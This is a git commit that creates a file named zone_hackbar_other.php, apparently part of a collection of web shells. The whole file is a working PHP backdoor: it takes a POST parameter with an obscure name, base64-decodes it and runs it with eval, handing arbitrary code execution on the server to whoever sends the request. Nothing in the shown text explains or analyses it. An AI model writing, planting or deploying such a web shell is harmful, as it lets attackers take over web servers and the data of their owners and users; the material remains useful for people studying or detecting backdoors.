Create zone_hackbar_other.php

This commit is contained in:
tennc 2016-05-14 10:00:16 +08:00
parent 2ca0e86887
commit 374204e0a1

View file

@ -0,0 +1,6 @@
<?php
$a = $_POST['n985de9'];
if(isset($a)) {
eval(base64_decode($a));
}
?>